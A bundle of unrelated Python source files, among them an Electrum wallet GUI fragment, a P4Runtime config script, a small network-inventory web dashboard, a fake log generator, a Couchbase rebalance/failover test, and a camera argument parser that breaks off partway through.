new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, coins=self.get_coins())
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_desc=tx_label)
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_db()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
def show_cert_mismatch_error(self):
if self.showing_cert_mismatch_error:
return
self.showing_cert_mismatch_error = True
self.show_critical(title=_("Certificate mismatch"),
msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" +
_("Electrum will now exit."))
self.showing_cert_mismatch_error = False
self.close()
|
console.py
|
from src.parse import args as arguments
from threading import Thread
import pathlib as pl
import code
import time
import sys
Off = '\033[0m' # Text Reset
Black = '\033[1;90m' # Black
Red = '\033[1;91m' # Red
Green = '\033[1;92m' # Green
Yellow = '\033[1;93m' # Yellow
Blue = '\033[1;94m' # Blue
Purple = '\033[1;95m' # Purple
Cyan = '\033[1;96m' # Cyan
White = '\033[1;97m' # White
def Interact(globals_var):
if arguments.interactive or arguments.persistent:
t = Thread(target=code.InteractiveConsole(locals=globals_var).interact)
t.start()
return t
return Thread()
def Join(thread: Thread):
if arguments.persistent:
if thread.is_alive():
thread.join(timeout=30)
def Out(*args):
print(str().join(args) if not arguments.silent else '')
def Log(filename, *args):
try:
with open(filename, "a") as logfile:
logfile.write(f"{Blue}{time.asctime()}{Off}")
[logfile.write(f"\t{statement}\n") for statement in args]
logfile.write('\n')
except FileNotFoundError:
pl.Path(''.join([f"/{i}" for i in filename.split('/')[0:-1] if i != ''])).mkdir(parents=True, exist_ok=True)
Log(filename, args)
def Verbose(*args):
Log(f"{sys.path[0]}/assets/logs/runtime.log")
if arguments.verbose or arguments.very_verbose:
Out(*args)
Log(f"{sys.path[0]}/assets/logs/verbose.log")
|
update_config.py
|
#!/usr/bin/env python2
# Copyright 2013-present Barefoot Networks, Inc.
# SPDX-License-Identifier: Apache-2.0
import argparse
from time import sleep
import grpc
from p4.v1 import p4runtime_pb2
from p4.config.v1 import p4info_pb2
from p4.tmp import p4config_pb2
import google.protobuf.text_format
import struct
import threading
import time
import Queue
parser = argparse.ArgumentParser(description='Mininet demo')
parser.add_argument('--device-id', help='Device id of switch',
type=int, action="store", default=1)
parser.add_argument('--p4info', help='text p4info proto',
type=str, action="store", required=True)
parser.add_argument('--json', help='context json',
type=str, action="store", required=True)
parser.add_argument('--grpc-addr', help='P4Runtime gRPC server address',
type=str, action="store", default='localhost:50051')
parser.add_argument('--loopback',
help='Provide this flag if you are using the loopback '
'P4 program and we will test Packet IO',
action="store_true", default=False)
args = parser.parse_args()
def build_bmv2_config(bmv2_json_path):
"""
Builds the device config for BMv2
"""
device_config = p4config_pb2.P4DeviceConfig()
device_config.reassign = True
with open(bmv2_json_path) as f:
device_config.device_data = f.read()
return device_config
class Test:
def __init__(self):
self.device_id = args.device_id
self.channel = grpc.insecure_channel(args.grpc_addr)
self.stub = p4runtime_pb2.P4RuntimeStub(self.channel)
def update_config(self):
request = p4runtime_pb2.SetForwardingPipelineConfigRequest()
request.device_id = self.device_id
request.election_id.high = 0
request.election_id.low = 1
config = request.config
with open(args.p4info, 'r') as p4info_f:
google.protobuf.text_format.Merge(p4info_f.read(), config.p4info)
device_config = build_bmv2_config(args.json)
config.p4_device_config = device_config.SerializeToString()
request.action = p4runtime_pb2.SetForwardingPipelineConfigRequest.VERIFY_AND_COMMIT
try:
self.stub.SetForwardingPipelineConfig(request)
except Exception as e:
print "Error during SetForwardingPipelineConfig"
print str(e)
return False
return True
def set_up_stream(self):
self.stream_out_q = Queue.Queue()
self.stream_in_q = Queue.Queue()
def stream_req_iterator():
while True:
p = self.stream_out_q.get()
if p is None:
break
yield p
def stream_recv(stream):
for p in stream:
self.stream_in_q.put(p)
self.stream = self.stub.StreamChannel(stream_req_iterator())
self.stream_recv_thread = threading.Thread(
target=stream_recv, args=(self.stream,))
self.stream_recv_thread.start()
self.handshake()
def handshake(self):
req = p4runtime_pb2.StreamMessageRequest()
arbitration = req.arbitration
arbitration.device_id = self.device_id
election_id = arbitration.election_id
election_id.high = 0
election_id.low = 1
self.stream_out_q.put(req)
rep = self.get_stream_packet("arbitration", timeout=3)
if rep is None:
print "Failed to establish handshake"
def tear_down_stream(self):
self.stream_out_q.put(None)
self.stream_recv_thread.join()
def get_packet_in(self, timeout=3):
msg = self.get_stream_packet("packet", timeout)
if msg is None:
print "Packet in not received"
else:
return msg.packet
def get_stream_packet(self, type_, timeout=1):
start = time.time()
try:
while True:
remaining = timeout - (time.time() - start)
if remaining < 0:
break
msg = self.stream_in_q.get(timeout=remaining)
if not msg.HasField(type_):
continue
return msg
except: # timeout expired
pass
return None
def send_packet_out(self, packet):
packet_out_req = p4runtime_pb2.StreamMessageRequest()
packet_out_req.packet.CopyFrom(packet)
self.stream_out_q.put(packet_out_req)
if __name__ == '__main__':
test = Test()
test.set_up_stream()
test.update_config()
if args.loopback:
packet_out = p4runtime_pb2.PacketOut()
packet_out.payload = "\xab" * 100
test.send_packet_out(packet_out)
test.get_packet_in()
test.tear_down_stream()
|
http-server.py
|
#!/usr/bin/env python
# put into netscan2
from __future__ import division, print_function
import multiprocessing as mp
import time
import bjoern
from jinja2 import Environment
import os
from roku import discover
# try to grab simplejson, if not fall back to the built in json
try:
import simplejson as json
except ImportError:
import json
# loader = jinja2.FileSystemLoader('./index.html')
# env = jinja2.Environment(loader=loader)
# template = env.get_template('')
# fix path for now
# import sys
# sys.path.append("../")
class Watcher(object):
"""
A simple class to watch if a file has changed.
https://stackoverflow.com/questions/182197/how-do-i-watch-a-file-for-changes/49007649#49007649
"""
def __init__(self, watch_file):
"""
watch_file - what file to watch
"""
self._cached_stamp = 0
self.filename = watch_file
def change(self):
"""
Has the file changed?
return True - file has changed
False - the file is still the same
"""
ret = False
stamp = os.stat(self.filename).st_mtime
if stamp != self._cached_stamp:
self._cached_stamp = stamp
ret = True
return ret
# get network data and watch for update
filename = 'network.json'
watcher = Watcher(filename)
data = {}
page = """
<!DOCTYPE html>
<html>
<header>
<link href="/assets/techno-font.css" rel="stylesheet">
<!--
<link rel="stylesheet" href="https://unpkg.com/purecss@1.0.0/build/pure-min.css">
<meta name="viewport" content="width=device-width, initial-scale=1">
-->
<style>
h1 {
text-align: center;
}
table.center {
margin-left:auto;
margin-right:auto;
}
table {
width: 75%;
border-collapse: collapse;
border: 2px solid gray;
}
th, td {
border: 1px solid black;
}
td, th {
border: 1px solid #ddd;
padding: 8px;
}
tr:nth-child(even){
background-color: #f2f2f2;
}
tr:hover {
background-color: #ddd;
}
th {
padding-top: 12px;
padding-bottom: 12px;
text-align: left;
background-color: DodgerBlue;
color: white;
}
</style>
</header>
<body>
<i class="tf-archlinux tf-128" style="color:dodgerblue;"></i>
<h1>{{ title }}</h1>
<!-- <table class="pure-table pure-table-striped"> -->
<table class="center">
<tr>
<th> Hostname </th>
<th> Status </th>
<th> IPv4 </th>
<th> MAC </th>
<th> Manufactorer </th>
<th> Open Ports </th>
</tr>
<tbody>
{% for item in items %}
<tr>
<td>{{item.hostname}}</td>
<td>{{item.status}}</td>
<td>{{item.ip}}</td>
<td>{{item.mac}}</td>
<td>{{item.company}}</td>
<td>{{item.openports}}</td>
</tr>
{% endfor %}
</tbody>
</table>
</body>
</html>
"""
template = Environment().from_string(page)
def readAsset(file_path, kind):
if kind == 'woff':
mime = 'application/font-woff'
elif kind == 'tff':
mime = 'application/font-tff'
elif kind == 'css':
mime = 'text/css'
# get the absolute path to this directory
path = os.path.abspath(os.path.dirname(__file__))
file_path = path + file_path
print(">> reading file: {}".format(file_path))
with open(file_path) as fd:
font = fd.read()
response_body = font
response_headers = [
('Content-Type', mime)
]
return (response_headers, response_body)
def app(environ, start_response):
# I don't like globals
global watcher
global filename
global data
try:
# why?
# just run this through shared memory
#
# old network scanner had: hostname, ipv4, mac, company name
# new: hostname, up/down, ipv4, mac, company, ports
if watcher.change():
print(">> updating data from {}".format(filename))
with open(filename) as fd:
data = json.load(fd)
print(data)
else:
print('>> no data change')
except Exception as e:
data = {}
print(e)
print(">> Error loading file: {}".format(filename))
# response_body = urls[environ['PATH_INFO']]
if environ['PATH_INFO'] == '/':
global template
# render html body as a binary string(utf-8)
response_body = template.render(
title="Network {}".format("1.2.3.x"),
items=data).encode('utf-8')
status = b'200 OK'
response_headers = [
(b'Content-Type', b'text/html'),
(b'Content-Length', str(len(response_body)).encode('utf-8'))
]
start_response(status, response_headers)
return [response_body.encode('utf-8')]
elif environ['PATH_INFO'].find('.css') > 0:
response_headers, response_body = readAsset(environ['PATH_INFO'], 'css')
start_response('200 OK', response_headers)
return [response_body.encode('utf-8')]
elif environ['PATH_INFO'].find('.woff') > 0:
response_headers, response_body = readAsset(environ['PATH_INFO'], 'woff')
start_response('200 OK', response_headers)
return [response_body]
elif environ['PATH_INFO'].find('.tff') > 0:
response_headers, response_body = readAsset(environ['PATH_INFO'], 'tff')
start_response('200 OK', response_headers)
return [response_body]
else:
# raise Exception(">> Invalid path: {}".format(environ['PATH_INFO']))
print(">> Invalid path: {}".format(environ['PATH_INFO']))
status = '404 OK'
response_body = 'Path not valid: {}'.format(environ['PATH_INFO'])
response_headers = [
('Content-Type', 'text/plain'),
('Content-Length', str(len(response_body)))
]
start_response(status, response_headers)
return [response_body.encode('utf-8')]
def scanner(e):
# this searches for computers on the network
while e.is_set:
print('** scan **')
ans = discover("roku:ecp")
for roku in ans:
print(roku)
time.sleep(5)
print("** scanner shutting down now **")
if __name__ == "__main__":
# start recon thread
e = mp.Event()
e.set()
p = mp.Process(target=scanner, args=(e,), name='scanner')
p.start()
host = "0.0.0.0"
port = 8000
print("Starting on: {}:{}".format(host, port))
bjoern.listen(app, host, port, reuse_port=True)
try:
bjoern.run()
except KeyboardInterrupt:
# i don't think this is working
e.clear()
p.join(1)
|
app.py
|
#
# This file is:
# Copyright (C) 2018 Calin Culianu <calin.culianu@gmail.com>
#
# MIT License
#
import os
from oregano_gui.ios_native.monkeypatches import MonkeyPatches
from oregano.util import set_verbosity
from oregano_gui.ios_native import ElectrumGui
from oregano_gui.ios_native.utils import call_later, get_user_dir, cleanup_tmp_dir, is_debug_build, NSLogSuppress, NSLog
from oregano.simple_config import SimpleConfig
from oregano.networks import set_mainnet, set_testnet
# NB: This is called from appdelegate.py "application_didFinishLaunchingWithOptions_"
def main():
cleanup_tmp_dir()
config_options = {
'verbose': is_debug_build(),
'cmd': 'gui',
'gui': 'ios_native',
'cwd': os.getcwd(),
'whitelist_servers_only' : True, # on iOS we force only the whitelist ('preferred') servers only for now as a security measure
'testnet': 'EC_TESTNET' in os.environ, # You can set the env when testing using Xcode "Scheme" editor
}
if config_options.get('testnet'):
set_testnet()
else:
set_mainnet()
set_verbosity(config_options.get('verbose'), timestamps=False, thread_id=False)
NSLogSuppress(not config_options.get('verbose'))
MonkeyPatches.patch()
config = SimpleConfig(config_options, read_user_dir_function = get_user_dir)
gui = ElectrumGui(config)
call_later(0.010, gui.main) # this is required for the activity indicator to actually animate. Switch to a direct call if not using activity indicator on Splash2
_printStats(config_options) # Prints some startup/debug stats such as Python version and SSL version (this is done in another thread to hopefully not impact startup overhead too much, as importing ssl may be a bit heavy)
return "Ergon FTW!"
def _printStats(config_options):
import threading
def thrdfunc(config_options):
# lazy init of SSL
import ssl, sys
from oregano import version, ecc_fast, schnorr
NSLog("Oregano lib version: %s (using server protocol: %s)", version.PACKAGE_VERSION, version.PROTOCOL_VERSION)
NSLog("Python version: %s", ' '.join(sys.version.split('\n')))
NSLog("OpenSSL version: %s", ssl.OPENSSL_VERSION)
NSLog("Fast ECC: %s Fast Schnorr: %s", str(ecc_fast.is_using_fast_ecc()), str(schnorr.has_fast_sign()))
#NSLog("Environment Vars:")
#for k,v in os.environ.copy().items():
# NSLog("%s=%s", str(k), str(v))
#NSLog("Config Vars:")
#for k,v in config_options.copy().items():
# NSLog("config[%s] = %s", str(k), str(v))
# /
# We do this from a thread so as to not delay app startup by importing more stuff we don't strictly need.
threading.Thread(target=thrdfunc, args=(config_options,), daemon=True).start()
|
1.thread.py
|
'''
说明: 多线程并发执行任务,比单线程要节约时间
'''
import time
from queue import Queue
from threading import Thread
def req1(param):
time.sleep(1)
return param
def main1():
return [req1(1), req1(2)]
def req2(param, res_value: Queue):
time.sleep(1)
res_value.put(param)
def main2():
res_value = Queue()
tasks = [Thread(target=req2, args=(1, res_value)),
Thread(target=req2, args=(2, res_value))]
for i in tasks:
i.start()
for i in tasks:
i.join()
return [res_value.get() for i in tasks]
if __name__ == '__main__':
t1 = time.time()
res1 = main1()
t2 = time.time()
res2 = main2()
t3 = time.time()
print(f'main1结果{res1}\t时间{round(t2-t1,1)}')
print(f'main2结果{res2}\t时间{round(t3-t2,1)}')
'''
输出:
main1结果[1, 2] 时间2.0
main2结果[2, 1] 时间1.0
'''
|
generate.py
|
import argparse
import datetime
import glob
import logging
import os
import random
import signal
import sys
import threading
import time
import faker
from typing import List, Union
import yaml
from jsonschema import validate, ValidationError
fake = faker.Faker()
class Generator:
"""
Generator class for log creation.
"""
def __init__(self, conf_dir: str, truncate: bool = False):
self.conf_dir = conf_dir.rstrip("/")
self.events = []
self.logger = logging.getLogger()
self.running = False
self.reload = True
self.truncate = truncate
self.schema = yaml.safe_load(
open(os.path.join(os.path.dirname(__file__), "schema.yaml"))
)
def handle_signal(self, sig: int, _) -> None:
"""
Handles signals to either exit or reload configuration files.
"""
if sig == signal.SIGHUP:
self.logger.info("Receiving SIGHUP({:d}), reloading config...".format(sig))
self.truncate = False
self.reload = True
elif sig == signal.SIGINT:
self.logger.critical("Receiving SIGINT({:d}), exiting...".format(sig))
self.stop()
def run(self) -> None:
self.running = True
self.reload = True
self.logger.info("Starting normal execution")
# Block while running
while self.running:
if self.reload:
# Stop constant reloading
self.reload = False
self.stop_generating()
self.events = []
# Load the configuration files
for config_file in Generator.gather_configs(self.conf_dir):
try:
event = threading.Event()
config = Generator.load_config(config_file, self.schema)
# Skip over disabled configurations
if not config["enabled"]:
self.logger.info("Skipped: {:s}".format(config_file))
continue
self.logger.info("Loaded: {:s}".format(config_file))
threading.Thread(
target=self.generate_log_entry, args=(event, config)
).start()
self.events.append(event)
except ValidationError as err:
self.logger.critical(
"Invalid configuration file: {:s}".format(config_file)
)
self.logger.critical(err)
def stop(self) -> None:
self.running = False
self.stop_generating()
def stop_generating(self) -> None:
for event in self.events:
event.set()
@staticmethod
def gather_configs(config_dir: str):
if not os.path.exists(config_dir):
raise FileNotFoundError(f"No such file or directory: {config_dir!r}")
elif os.path.isfile(config_dir):
return [config_dir]
else:
return glob.glob(f"{config_dir}/*.yaml")
@staticmethod
def load_config(config_file: str, schema: dict) -> dict:
with open(config_file, "r") as stream:
config = yaml.safe_load(stream)
validate(config, schema)
config.setdefault("enabled", True)
config.setdefault("offset", {"seconds": 0})
config.setdefault("jitter", {"seconds": 0})
config.setdefault("fields", {})
config["frequency"] = datetime.timedelta(**config["frequency"])
config["offset"] = datetime.timedelta(**config["offset"])
config["jitter"] = datetime.timedelta(**config["jitter"])
for name in config["fields"]:
config["fields"][name].setdefault("count", 0)
return config
@staticmethod
def get_timestamps(
config: dict, timestamp: datetime.datetime
) -> List[datetime.datetime]:
timestamp -= config["offset"]
timestamps = []
for _ in range(config["amount"]):
seconds = random.randint(0, config["jitter"].total_seconds())
timestamps.append(timestamp - datetime.timedelta(seconds=seconds))
return sorted(timestamps)
@staticmethod
def next_value(config: dict, name: str) -> str:
"""
Get the next value for the field.
:param dict config: Configuration dictionary
:param str name: Name of the field
"""
fields = config["fields"]
fields[name]["count"] += 1
# If the value should be repeated
if "value" in fields[name] and "repeat" in fields[name]:
if fields[name]["count"] <= fields[name]["repeat"]:
return fields[name]["value"]
else:
fields[name]["count"] = 0
# If the value should change
if "value" in fields[name] and "change" in fields[name]:
if random.random() > fields[name]["change"]:
return fields[name]["value"]
else:
fields[name]["count"] = 0
# Determine the value
fields[name]["value"] = Generator.get_value(config, name)
return fields[name]["value"]
@staticmethod
def get_value(config: dict, name: str) -> Union[str, None]:
"""
Generate a value based on field type.
:param dict config: Configuration dictionary
:param str name: Name of the field
"""
field = config["fields"][name]
if field["type"] == "enum":
return str(random.choice(field["values"]))
elif field["type"] == "chance":
options = [i["option"] for i in field["choices"]]
weights = [i["weight"] for i in field["choices"]]
return str(random.choices(options, weights)[0])
elif field["type"] == "integer":
return str(random.randint(field["min"], field["max"]))
elif field["type"] == "float":
return str(random.uniform(field["min"], field["max"]))
elif field["type"] == "timestamp":
return config["timestamp"].strftime(field["format"])
elif field["type"] == "ip":
return ".".join(str(random.randint(0, 255)) for _ in range(4))
elif field["type"] == "fakename":
return fake.name()
else:
return None
def generate_log_entry(self, event: threading.Event, config: dict) -> None:
# Create the directory if not there
if not os.path.exists(os.path.dirname(config["file"])):
os.makedirs(os.path.dirname(config["file"]))
# Truncate the log file
if self.truncate:
with open(config["file"], "w") as log_file:
log_file.truncate()
else:
with open(config["file"], "a"):
os.utime(config["file"], None)
time.sleep(0)
while not event.wait(config["frequency"].total_seconds()):
self.logger.info(
'Writing %4d logs for "%s" (%s)'
% (config["amount"], config["name"], config["file"])
)
for timestamp in self.get_timestamps(config, datetime.datetime.utcnow()):
config["timestamp"] = timestamp
values = {
field: self.next_value(config, field) for field in config["fields"]
}
log_entry = config["format"].format(**values)
with open(config["file"], "a") as log_file:
log_file.write(log_entry + "\n")
def main() -> None:
# Define the command arguments
parser = argparse.ArgumentParser(description="Generate log events")
parser.add_argument(
"config_dir",
metavar="/path/to/config",
type=str,
help="Path to configuration directory or file",
)
parser.add_argument(
"--level",
"-l",
default=logging.getLevelName(logging.INFO),
help="Logging level",
)
parser.add_argument(
"--truncate", "-t", action="store_true", help="Truncate the log files on start"
)
args = parser.parse_args()
# Get the logger
logging.basicConfig(
stream=sys.stderr,
level=args.level,
format="%(asctime)s %(levelname)-8s %(message)s",
)
logger = logging.getLogger()
# Create the generator
generator = Generator(args.config_dir, args.truncate)
generator.logger = logger
# Specify the signal handler
signal.signal(signal.SIGINT, generator.handle_signal)
signal.signal(signal.SIGHUP, generator.handle_signal)
# Run the generator
try:
generator.run()
except FileNotFoundError as err:
generator.logger.critical(err)
sys.exit(1)
if __name__ == "__main__":
main()
|
collections_drop_recreate_rebalance.py
|
import threading
import time
import json
from Cb_constants import CbServer
from collections_helper.collections_spec_constants import MetaCrudParams
from bucket_collections.collections_base import CollectionBase
from membase.api.rest_client import RestConnection
from bucket_utils.bucket_ready_functions import BucketUtils
from couchbase_helper.tuq_helper import N1QLHelper
from platform_utils.remote.remote_util import RemoteMachineShellConnection
from table_view import TableView
class CollectionsDropRecreateRebalance(CollectionBase):
def setUp(self):
super(CollectionsDropRecreateRebalance, self).setUp()
self.known_nodes = self.cluster.servers[:self.nodes_init]
self.nodes_failover = self.input.param("nodes_failover", 1)
self.nodes_swap = self.input.param("nodes_swap", 0)
self.recovery_type = self.input.param("recovery_type", "delta")
self.rebalance_moves_per_node = self.input.param("rebalance_moves_per_node", 2)
self.sleep_between_collections_crud = self.input.param("sleep_between_collections_crud", None)
self.cluster_util.set_rebalance_moves_per_nodes(
self.cluster.master,
rebalanceMovesPerNode=self.rebalance_moves_per_node)
self.change_ephemeral_purge_age_and_interval = self.input.param("change_ephemeral_purge_age_and_interval",
True)
if self.change_ephemeral_purge_age_and_interval:
self.set_ephemeral_purge_age_and_interval()
self.data_load_flag = False # When to start/stop drop/recreate
self.data_loading_thread = None
self.data_load_exception = None # Object variable to assign data load thread's exception
self.N1qltxn = self.input.param("N1ql_txn", False)
if self.N1qltxn:
self.n1ql_server = self.cluster_util.get_nodes_from_services_map(
cluster=self.cluster,
service_type=CbServer.Services.N1QL,
get_all_nodes=True)
self.n1ql_helper = N1QLHelper(server=self.n1ql_server,
use_rest=True,
buckets = self.cluster.buckets,
log=self.log,
scan_consistency='REQUEST_PLUS',
num_collection=3,
num_buckets=1,
num_savepoints=1,
override_savepoint=False,
num_stmt=10,
load_spec=self.data_spec_name)
self.bucket_col = self.n1ql_helper.get_collections()
self.stmts = self.n1ql_helper.get_stmt(self.bucket_col)
self.stmts = self.n1ql_helper.create_full_stmts(self.stmts)
def tearDown(self):
self.cluster_util.set_rebalance_moves_per_nodes(
self.cluster.master, rebalanceMovesPerNode=4)
if self.data_loading_thread:
# stop data loading before tearDown if its still running
self.data_load_flag = False
self.data_loading_thread.join()
self.data_loading_thread = None
if self.N1qltxn:
super(CollectionBase, self).tearDown()
else:
super(CollectionsDropRecreateRebalance, self).tearDown()
def set_ephemeral_purge_age_and_interval(self, ephemeral_metadata_purge_age=0,
ephemeral_metadata_purge_interval=1):
"""
Enables diag eval on master node and updates the above two parameters
for all ephemeral buckets on the cluster
"""
shell = RemoteMachineShellConnection(self.cluster.master)
shell.enable_diag_eval_on_non_local_hosts()
shell.disconnect()
ephemeral_buckets = [bucket for bucket in self.cluster.buckets if bucket.bucketType == "ephemeral"]
for ephemeral_bucket in ephemeral_buckets:
rest = RestConnection(self.cluster.master)
status, content = rest.set_ephemeral_purge_age_and_interval(bucket=ephemeral_bucket.name,
ephemeral_metadata_purge_age=ephemeral_metadata_purge_age,
ephemeral_metadata_purge_interval=ephemeral_metadata_purge_interval)
if not status:
raise Exception(content)
def pick_nodes_for_rebalance(self):
if self.nodes_swap:
self.nodes_in = self.nodes_out = self.nodes_swap
self.add_nodes = self.cluster.servers[self.nodes_init:self.nodes_init + self.nodes_in]
self.remove_nodes = self.cluster.servers[:self.nodes_out]
self.cluster.master = self.master = self.cluster.servers[self.nodes_out]
self.rest = RestConnection(self.cluster.master)
def pick_nodes_for_failover(self, rebalance_operation):
self.failover_nodes = self.cluster.servers[:self.nodes_failover]
# Change the orchestrator, if there is rebalance-out of orchestrator after failover
if "rebalance_out" in rebalance_operation:
self.cluster.master = self.master = self.cluster.servers[self.nodes_failover]
self.rest = RestConnection(self.cluster.master)
def wait_for_failover_or_assert(self, expected_failover_count, timeout=300):
time_start = time.time()
time_max_end = time_start + timeout
actual_failover_count = 0
while time.time() < time_max_end:
actual_failover_count = self.get_failover_count()
if actual_failover_count == expected_failover_count:
break
time.sleep(20)
time_end = time.time()
if actual_failover_count != expected_failover_count:
self.log.info(self.rest.print_UI_logs())
self.assertTrue(actual_failover_count == expected_failover_count,
"{0} nodes failed over, expected : {1}"
.format(actual_failover_count,
expected_failover_count))
self.log.info("{0} nodes failed over as expected in {1} seconds"
.format(actual_failover_count, time_end - time_start))
def get_failover_count(self):
rest = RestConnection(self.cluster.master)
cluster_status = rest.cluster_status()
failover_count = 0
# check for inactiveFailed
for node in cluster_status['nodes']:
if node['clusterMembership'] == "inactiveFailed":
failover_count += 1
return failover_count
def wait_for_rebalance_to_complete(self, task):
self.task.jython_task_manager.get_task_result(task)
self.assertTrue(task.result, "Rebalance Failed")
def spec_for_drop_recreate(self):
spec = {
# Scope/Collection ops params
MetaCrudParams.COLLECTIONS_TO_FLUSH: 0,
MetaCrudParams.COLLECTIONS_TO_DROP: 250,
MetaCrudParams.SCOPES_TO_DROP: 3,
MetaCrudParams.SCOPES_TO_ADD_PER_BUCKET: 0,
MetaCrudParams.COLLECTIONS_TO_ADD_FOR_NEW_SCOPES: 0,
MetaCrudParams.COLLECTIONS_TO_ADD_PER_BUCKET: 0,
# Only dropped scope/collection will be created.
# While scope recreated all prev collection will also be created
# In both the collection creation case, previous maxTTL value of
# individual collection is considered
MetaCrudParams.SCOPES_TO_RECREATE: 3,
MetaCrudParams.COLLECTIONS_TO_RECREATE: 250,
# Applies only for the above listed scope/collection operations
MetaCrudParams.BUCKET_CONSIDERED_FOR_OPS: "all",
MetaCrudParams.SCOPES_CONSIDERED_FOR_OPS: "all",
MetaCrudParams.COLLECTIONS_CONSIDERED_FOR_OPS: "all",
}
return spec
def print_spec_details(self, spec, cycles, elapsed_time):
table = TableView(self.log.info)
table.set_headers(["Operation", "Value"])
table.add_row(["Collections dropped and recreated", str(spec[MetaCrudParams.COLLECTIONS_TO_RECREATE])])
table.add_row(["Scopes dropped and recreated", str(spec[MetaCrudParams.SCOPES_TO_RECREATE])])
table.add_row(["Cycles of data load", str(cycles)])
table.add_row(["Time Elapsed in secs", str(elapsed_time)])
table.display("Data load details")
def data_load(self):
cycles = 0
start_time = time.time()
while self.data_load_flag:
doc_loading_spec = self.spec_for_drop_recreate()
try:
_ = BucketUtils.perform_tasks_from_spec(self.cluster,
self.cluster.buckets,
doc_loading_spec)
except Exception as e:
self.data_load_exception = e
raise
cycles = cycles + 1
# TODO : This sleep is intentionally added. See MB-47533
# TODO : Needs to be reverted when MB-47810 is fixed
if self.sleep_between_collections_crud:
time.sleep(self.sleep_between_collections_crud)
end_time = time.time()
elapsed_time = end_time - start_time
self.print_spec_details(self.spec_for_drop_recreate(), cycles, elapsed_time)
def load_collections_with_rebalance(self, rebalance_operation):
self.pick_nodes_for_rebalance()
if self.N1qltxn:
self.N1ql_load_task = self.task.async_n1qlTxn_query( self.stmts,
n1ql_helper=self.n1ql_helper,
commit=True,
scan_consistency="REQUEST_PLUS")
else:
self.data_load_flag = True
self.data_loading_thread = threading.Thread(target=self.data_load)
self.data_loading_thread.start()
if rebalance_operation == "rebalance_in":
operation = self.task.async_rebalance(self.known_nodes, self.add_nodes, [],
retry_get_process_num=self.retry_get_process_num*3)
elif rebalance_operation == "rebalance_out":
operation = self.task.async_rebalance(self.known_nodes, [], self.remove_nodes,
retry_get_process_num=self.retry_get_process_num*3)
elif rebalance_operation == "swap_rebalance":
for node in self.add_nodes:
self.rest.add_node(self.cluster.master.rest_username, self.cluster.master.rest_password,
node.ip, self.cluster.servers[self.nodes_init].port)
operation = self.task.async_rebalance(self.known_nodes, [], self.remove_nodes,
check_vbucket_shuffling=False,
retry_get_process_num=self.retry_get_process_num*3)
elif rebalance_operation == "rebalance_in_out":
for node in self.add_nodes:
self.rest.add_node(self.cluster.master.rest_username, self.cluster.master.rest_password,
node.ip, self.cluster.servers[self.nodes_init].port)
operation = self.task.async_rebalance(self.known_nodes, [], self.remove_nodes,
check_vbucket_shuffling=False,
retry_get_process_num=self.retry_get_process_num*3)
self.wait_for_rebalance_to_complete(operation)
self.data_load_flag = False
if not self.N1qltxn:
self.data_loading_thread.join()
self.data_loading_thread = None
if self.data_load_exception:
self.log.error("Caught exception from data load thread")
self.fail(self.data_load_exception)
def load_collections_with_failover(self, rebalance_operation):
self.pick_nodes_for_failover(rebalance_operation)
if self.N1qltxn:
self.N1ql_load_task = self.task.async_n1qlTxn_query( self.stmts,
n1ql_helper=self.n1ql_helper,
commit=True,
scan_consistency="REQUEST_PLUS")
else:
self.data_load_flag = True
self.data_loading_thread = threading.Thread(target=self.data_load)
self.data_loading_thread.start()
graceful = True if "graceful" in rebalance_operation else False
failover_count = 0
self.log.info("failing over nodes {0}".format(self.failover_nodes))
for failover_node in self.failover_nodes:
_ = self.task.failover(self.known_nodes, failover_nodes=[failover_node],
graceful=graceful, wait_for_pending=120)
failover_count = failover_count + 1
self.wait_for_failover_or_assert(failover_count)
if "recovery" in rebalance_operation:
for failover_node in self.failover_nodes:
self.rest.set_recovery_type(otpNode='ns_1@' + failover_node.ip,
recoveryType=self.recovery_type)
operation = self.task.async_rebalance(self.known_nodes, [], [],
retry_get_process_num=self.retry_get_process_num*3)
else:
operation = self.task.async_rebalance(self.known_nodes, [], self.failover_nodes,
retry_get_process_num=self.retry_get_process_num*3)
self.wait_for_rebalance_to_complete(operation)
self.sleep(60, "Wait after rebalance completes before stopping data load")
self.data_load_flag = False
if not self.N1qltxn:
self.data_loading_thread.join()
self.data_loading_thread = None
if self.data_load_exception:
self.log.error("Caught exception from data load thread")
self.fail(self.data_load_exception)
def test_data_load_collections_with_rebalance_in(self):
self.load_collections_with_rebalance(rebalance_operation="rebalance_in")
def test_data_load_collections_with_rebalance_out(self):
self.load_collections_with_rebalance(rebalance_operation="rebalance_out")
def test_data_load_collections_with_swap_rebalance(self):
self.load_collections_with_rebalance(rebalance_operation="swap_rebalance")
def test_data_load_collections_with_rebalance_in_out(self):
self.load_collections_with_rebalance(rebalance_operation="rebalance_in_out")
def test_data_load_collections_with_graceful_failover_rebalance_out(self):
self.load_collections_with_failover(rebalance_operation="graceful_failover_rebalance_out")
def test_data_load_collections_with_hard_failover_rebalance_out(self):
self.load_collections_with_failover(rebalance_operation="hard_failover_rebalance_out")
def test_data_load_collections_with_graceful_failover_recovery(self):
self.load_collections_with_failover(rebalance_operation="graceful_failover_recovery")
def test_data_load_collections_with_hard_failover_recovery(self):
self.load_collections_with_failover(rebalance_operation="hard_failover_recovery")
|
camera_setting.py
|
import logging
import threading
import subprocess
import numpy as np
import cv2
USB_GSTREAMER = True
def add_camera_args(parser):
"""Add parser augument for camera options."""
parser.add_argument('--file', dest='use_file',
help='use a video file as input (remember to '
'also set --filename)',
action='store_true')
parser.add_argument('--image', dest='use_image',
help='use an image file as input (remember to '
'also set --filename)',
action='store_true')
parser.add_argument('--filename', dest='filename',
help='video file name, e.g. test.mp4',
default=None, type=str)
parser.add_argument('--usb', dest='use_usb',
help='use USB webcam (remember to also set --vid)',
action='store_true')
parser.add_argument('--vid', dest='video_dev',
help='device # of USB webcam (/dev/video?) [0]',
